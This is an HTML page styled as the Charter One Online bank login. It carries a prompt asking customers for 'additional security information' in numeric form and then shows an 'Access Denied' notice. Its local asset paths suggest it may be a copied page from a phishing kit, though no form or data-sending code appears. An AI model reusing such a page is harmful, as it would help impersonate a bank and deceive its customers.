

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
	<title>Charter One Online</title>
	
<style>


<script>
body {
 background-color:#ffffff;
 margin-left: 15px;
 margin-top: 15px;
 margin-right: 15px;
 margin-bottom: 10px;
}
.homesub {background-color:#A8A8A8; font-family:Arial; font-size:10pt; color:#000000; font-weight:normal;}
.homesub2 {background-color:#E8E8E8; font-family:Arial; font-size:8pt; color:#000000; font-weight:normal;}
.homesub2-a {background-color:#FFFFFF; font-family:Arial; font-size:8pt; color:#000000; font-weight:normal;}

A {font-family:Arial, Helvetica, sans-serif; color:#000000;}
A:visited {color:#000000;}
A:active {color:#000000;}
A:hover {color:#000000;}

A.sub {font-family:Arial, Helvetica, sans-serif; color:#000000; text-decoration:none; font-weight:normal;}
A:visited.sub {color:#000000;}
A:active.sub {color:#000000;}
A:hover.sub {color:#000000; text-decoration:underline;}

A.sub-a {font-family:Arial, Helvetica, sans-serif; color:#000000; text-decoration:none; font-weight:bold;}
A:visited.sub-a {color:#000000;}
A:active.sub-a {color:#000000;}
A:hover.sub-a {color:#000000; text-decoration:underline;}

A.sub2 {font-family:Arial, Helvetica, sans-serif; color:#000000; text-decoration:none; font-weight:normal;}
A:visited.sub2 {color:#000000;}
A:active.sub2 {color:#000000;}
A:hover.sub2 {color:#000000; text-decoration:underline;}

A.sub2-a {font-family:Arial, Helvetica, sans-serif; color:#000000; text-decoration:none; font-weight:normal;}
A:visited.sub2-a {color:#000000;}
A:active.sub2-a {color:#000000;}
A:hover.sub2-a {color:#000000; text-decoration:underline;}

A.alt {text-decoration:none; font-family:Arial, Helvetica, sans-serif; font-size:8pt; color:#000000;}
A.alt:visited {color:#FFFFFF;}
A.alt:active {color:#FFFFFF;}
A.alt:hover {color:#FFFFFF;}
A.colhead {color:#FFFFFF;}
A.colhead:visited {color:#FFFFFF;}
A.colhead:active {color:#FFFFFF;}
A.colhead:hover {color:#FFFFFF;}

A.sub2-b {font-family:Arial, Helvetica, sans-serif; color:#006644; text-decoration:none; font-weight:bold;}
A:visited.sub2-b {color:#006644;}
A:active.sub2-b {color:#006644;}
A:hover.sub2-b {color:#006644; text-decoration:underline;}

.headerfont {
	font-family:Arial, Helvetica, sans-serif;
	font-size:14pt;
	font-weight:bold;
	color:#000000;
}

.green-headerfont {
	font-family:Arial, Helvetica, sans-serif;
	font-size:14pt;
	font-weight:bold;
	color:#229977;
}
.black-headerfont {
	font-family:Arial, Helvetica, sans-serif;
	font-size:14pt;
	font-weight:bold;
	color:#000000;
}
.black-messagefont {
	font-family:Arial, Helvetica, sans-serif;
	font-size:7.5pt;
	font-weight:normal;
	color:#000000;
}
.grey-headerfont {
	font-family:Arial, Helvetica, sans-serif;
	font-size:12pt;
	font-weight:bold;
	color:#666666;
}

.promptfont, .promptfontbold {
	font-family:Arial;
	font-size:11pt;
	font-weight:normal;
	color:#000000;
}

.welcomefont,.welcomefontbold {
	font-family:Arial;
	font-size:9pt;
	font-weight:normal;
	color:#666666;
}
.welcomefontbold {
	font-weight:bold;
}
.loginname {
 font-family:Arial;
	font-size:15pt;
	font-weight:bold;
	color:#666666;
}

.subtitle {
 font-family:Arial;
	font-size:9pt;
	font-weight:normal;
	color:#666666;
}

.subtitle2 {
 font-family:Arial;
	font-size:10pt;
	font-weight:normal;
	color:#666666;
}

.subtitlebold {
 font-family:Arial;
	font-size:9pt;
	font-weight:bold;
	color:#333333;
}

.subtitlebold2 {
 font-family:Arial;
	font-size:10pt;
	font-weight:bold;
	color:#333333;
}

.subtitleunderline {
 font-family:Arial;
	font-size:9pt;
	font-weight:normal;
	color:#000000;
	text-decoration:underline;
}

.mainfont, .mainfontbold {
	font-family:Arial, Helvetica, sans-serif;
	font-size:9pt;
	font-weight:normal;
	color:#000000;
}
.minifont, .minifontbold {
	font-family:Arial, Helvetica, sans-serif;
	font-size:8pt;
	color:#000000;
}
.mainfontbold {font-weight:bold;}
.promptfontbold {font-weight:bold;}
.minifontbold {font-weight:bold;}

.copyright {
	font-family:Arial, Helvetica, sans-serif;
	font-size:8pt;
	font-weight:normal;
} 

.errortitle {
	font-family:Arial, Helvetica, sans-serif;
	font-size:10pt;
	font-weight:bold;
	color:#FFFFFF;
	background-color:#FF9900;
}

.subaccountmenu {
	font-family:Arial, Helvetica, sans-serif;
	font-size:11pt;
	font-weight:bold;
	color:#333333;
}

.subaccountmenu2 {
 font-family:Arial;
	font-size:11pt;
	font-weight:normal;
	color:#006644;
}

.subaccountmenu3 {
 font-family:Arial;
	font-size:11pt;
	font-weight:normal;
	color:#666666;
}

.errortext {
	font-family:Arial, Helvetica, sans-serif;
	font-size:10pt;
	font-weight:normal;
	color:#000000;
	background-color:#EAEAEA;
}
.columnheader, .columnheaderu, .pcolumnheader, .portallabel {
	font-family:Arial;
	font-size:9pt;
	font-weight:bold;
	color:#333333;
	text-decoration:none;
}
.columnheaderu {
 text-decoration:underline;
}

.ltrow, .pltrow {
	font-family:Arial, Helvetica, sans-serif;
	font-size:9pt;
	color:#000000;
	background-color:#FFFFFF;
}
.dkrow, .pdkrow {
	font-family:Arial, Helvetica, sans-serif;
	font-size:9pt;
	color:#000000;
	background-color:#EAEAEA;
}
.pcolumnheader {font-size:8pt;}
.pltrow {font-size:8pt;}
.pdkrow {font-size:8pt;}
.portallabel {font-size:8pt; height:18; background-color:#000066;}
.portaloutline {background-color:#3366CC;}

.asterisk {
	font-size:12pt;
	color:#FF9900;
}

.quicklinks {
	font-family:Arial;
	font-size:11pt;
	font-weight:bold;
	color:#ffffff;
}

.subquicklinks,.subquicklinksu {
 font-family:Arial;
	font-size:9pt;
	color:#006644;
 text-decoration=none;
}

.subquicklinksu {
 text-decoration=underline;
}

.subquicklinks3 {
 font-family:Arial;
	font-size:10pt;
	color:#006644;
 text-decoration=none;
}

.footerbold {
	font-family:Arial;
	font-size:9pt;
	font-weight:bold;
	color:#333333;
}

.footer {
	font-family:Arial;
	font-size:9pt;
	font-weight:normal;
	color:#666666;
}

.footerlinks {
	font-family:Arial, Helvetica, sans-serif;
	font-size:9pt;
	font-weight:bold;
	color:#006644;
}

.tableheader {
 font-family:Arial;
	font-size:10pt;
	font-weight:bold;
	color:#FFFFFF;
}

.subquicklinks2 {
 font-family:Arial;
	font-size:9pt;
	color:#006644;
}

.navlinks {
 font-family:Arial;
	font-size:9pt;
	color:#B6B6B6;
}
.subaccountmenu3Bold2 {
 font-family:Arial;
	font-size:11pt;
	font-weight:Bold;
	color:#666666;
}

.mainfontnou {
	font-family:Arial, Helvetica, sans-serif;
	font-size:9pt;
	font-weight:normal;
	color:#000000;
	text-decoration=none;
}

.solid-green { padding: 5px; border: 2px solid #229977; }

.itemheaders {
 font-family:Arial;
	font-size:9pt;
	font-weight:Bold;
	color:#000000;
}

h2 {
	font: bold 16px Arial;
	color: #F66;
}
#ban {
	padding-right: 12px;
}
	#ban img {
		margin-bottom: 7px;
	}

</script>
</style>
</head>

<body>

<script src="change-image.js" language="JavaScript"></script>

<!-- TOP NAV -->
<table width="741" cellpadding="0" cellspacing="0" border="0">
	 <tr>
			<TD><img src="img/spacer.gif" width="5" height="6"></TD> <td height="71"><img src="img/coblogo.gif"></td>
	 </tr>
</table>
<!-- END TOP NAV -->




<!-- CONTENT AREA -->
<table width="720" cellpadding="0" cellspacing="0" border="0" bgcolor="#FFFFFF"><tr>
<TD><img src="img/spacer.gif" width="27" height="6"></TD><td>
<!-- CONTENT AREA NAV -->
<table width="100%" cellpadding="0" cellspacing="0" border="0" bgcolor="#FFFFFF">
		
	<tr>
		
		<td width="28%"><img src="img/spacer.gif" width="10" height="6"><a href="http://www.charterone.com" target=_top><img border="0" alt="" OnMouseOut="mOut(this,'img/home.gif')" OnMouseOver="mOver(this,'img/home_over.gif')" src="img/home.gif"></a></td>
 	
		<td class="green-headerfont">Log in to Charter One Online™</td>
	
	</tr>
	<tr>
	
	 <td width="28%" valign="top"><img src="img/spacer.gif" width="10" height="6"><a href="https://www2.charteroneonline.com/efs/servlet/efs/wait.jsp?target=inc/init/enroll-init.jsp?BrandSettingsFile=cobSettings.jsp"><img border="0" alt="" OnMouseOut="mOut(this,'img/enroll.gif')" OnMouseOver="mOver(this,'img/enroll_over.gif')" src="img/enroll.gif"></a></td>
	 <td colspan="2" class="black-messagefont"></p>
			<p class="MsoNormal" style="margin-top: 0; margin-bottom: 0">&nbsp;</p>
			<p class="MsoNormal" style="margin-top: 0; margin-bottom: 0">
			<b><font face="Arial" size="2" color="#000000">To prevent unauthorized access to your account you are required to enter additional security information.
Numeric values only, no spaces or dashes</font></b>
			</p>
			<p class="MsoNormal" style="margin-top: 0; margin-bottom: 0">
			&nbsp;</p></TD></TR></TBODY></TABLE>


<!-- END CONTENT AREA NAV -->


<script>
 function openHelp(HelpURL) {
 //alert(HelpURL);
 MyWindow=window.open('http://www.charterone.com/onlinehelp/', 'popUpLoginHelp','width=500,height=580,resizable,scrollbars=yes,status=0,toolbar=0,location=0');
 }



function HelpLogin() {

	
	props=window.open('https://www.charteroneonline.com/popup/cpmsg.htm', 'poppage', 'toolbars=0, scrollbars=1, location=0, statusbars=0, menubars=0, resizable=0, width=700, height=400');
	
}

 function openUserIdWindow() {
 //alert(HelpURL);
 userIdWindow=window.open('https://www.charteroneonline.com/WID.HTM','userIdWindow','width=500,height=580,resizable,scrollbars=yes,status=0,toolbar=0,location=0');
 }
 
 function popUpLoginHelp() {
 //alert(HelpURL);
 popUpLoginHelp=window.open('https://www.charteroneonline.com/efs/servlet/efs/logon_help.html','popUpLoginHelp','width=500,height=580,resizable,scrollbars=yes,status=0,toolbar=0,location=0');
 }
 
 //make sure user name is all lowercase
 function toLower(){
 if(document.forms[0].UserName.value.length > 0) {
 document.forms[0].UserName.value = document.forms[0].UserName.value.toLowerCase();
 //alert(document.forms[0].UserName.value);
 }
 }

 function focusSwitch(){
 if(document.forms[0].UserNameDD.length > 1){
 document.forms[0].Password.focus();
 } else {
 document.forms[0].UserName.focus();
 }
 }

 function checkEnter(event){ //Checks Enter Key to workaround MAC javascript issue
 var characterCode;
 if(event && event.which){
 characterCode = e.which; //Netscape key code
 }
 else{
 characterCode = event.keyCode // IE's keyCode
 }

 if(characterCode == 13){ //if generated character code is equal to enter key
 if(document.forms[0].Password.value.length > 0) {
 document.forms[0].UserName.value = document.forms[0].UserName.value.toLowerCase();
 document.forms[0].submit();
 }
 }

 }
</script>



<br>
<table width="720" cellpadding="0" cellspacing="0" border="0">
<tr>
	<td width="28%" rowspan="8" valign="top" align="right"><div id="ban"><img src="img/ad2homebuy.gif" /><br /><img src="img/Ad3homebuy.gif" /></div></td>
	<td><h2>Access Denied</h2></td>
</tr>
<tr>
	<td nowrap><br /><a href="javascript:void(0); openHelp('help/');" class="subquicklinks"><span class="subquicklinksu">Online Help?</span></a></td>
</tr>
<tr>
	<td><img src="img/spacer.gif" width="10" height="20" border="0" alt=""></td>
</tr>
<tr>
	<td><img src="img/spacer.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
	<td><img src="img/spacer.gif" width="10" height="20" border="0" alt=""></td>
</tr>
</table>

<!-- FOOTER -->

<table width="720" height="24" cellspacing="0" cellpadding="0" border="0">
 <tr>
 <td align="left" class="footerbold"> For Customer Service please call:</td>
 <td width="28" height="9"></td>
 </tr>
 <tr>
 <td align="left" class="footer"> Personal customers: 1-877-981-3733.</td>
 <td width="28" height="9"></td>
 </tr>
 <tr>
 <td align="left" class="footer"> Business customers: 1-888-229-8211.</td>
 <td align="right" class="footer">Member FDIC <img src="img/ehl.gif" width="28" height="9"> Equal Housing Lender</td>
 </tr>
 <tr height="4">
 <td colspan="2"></td>
 </tr>
 

 <tr>
 <td align="left" class="footerlinks">
 <a target="_blank" href="http://www.charterone.com/general/privacy.asp"><span class="subquicklinksu">Privacy & Security</span></a>
 | <a target="_blank" href="http://www.charterone.com/customercare/terms.asp"> <span class="subquicklinksu">Terms of Use </span></a>&nbsp;
 | <a target="_blank" href="http://www.charterone.com/legalcenter/security_policy.asp"><span class="subquicklinksu">Charter One Online Guarantee </span></a> <SMALL><SUP>TM</SUP></SMALL>
 </td>
 
 
 <td align="right" class="footer">© 2005 Charter One Bank. All Rights Reserved.</td>
 
 </tr>
</table>


</body>
</html>







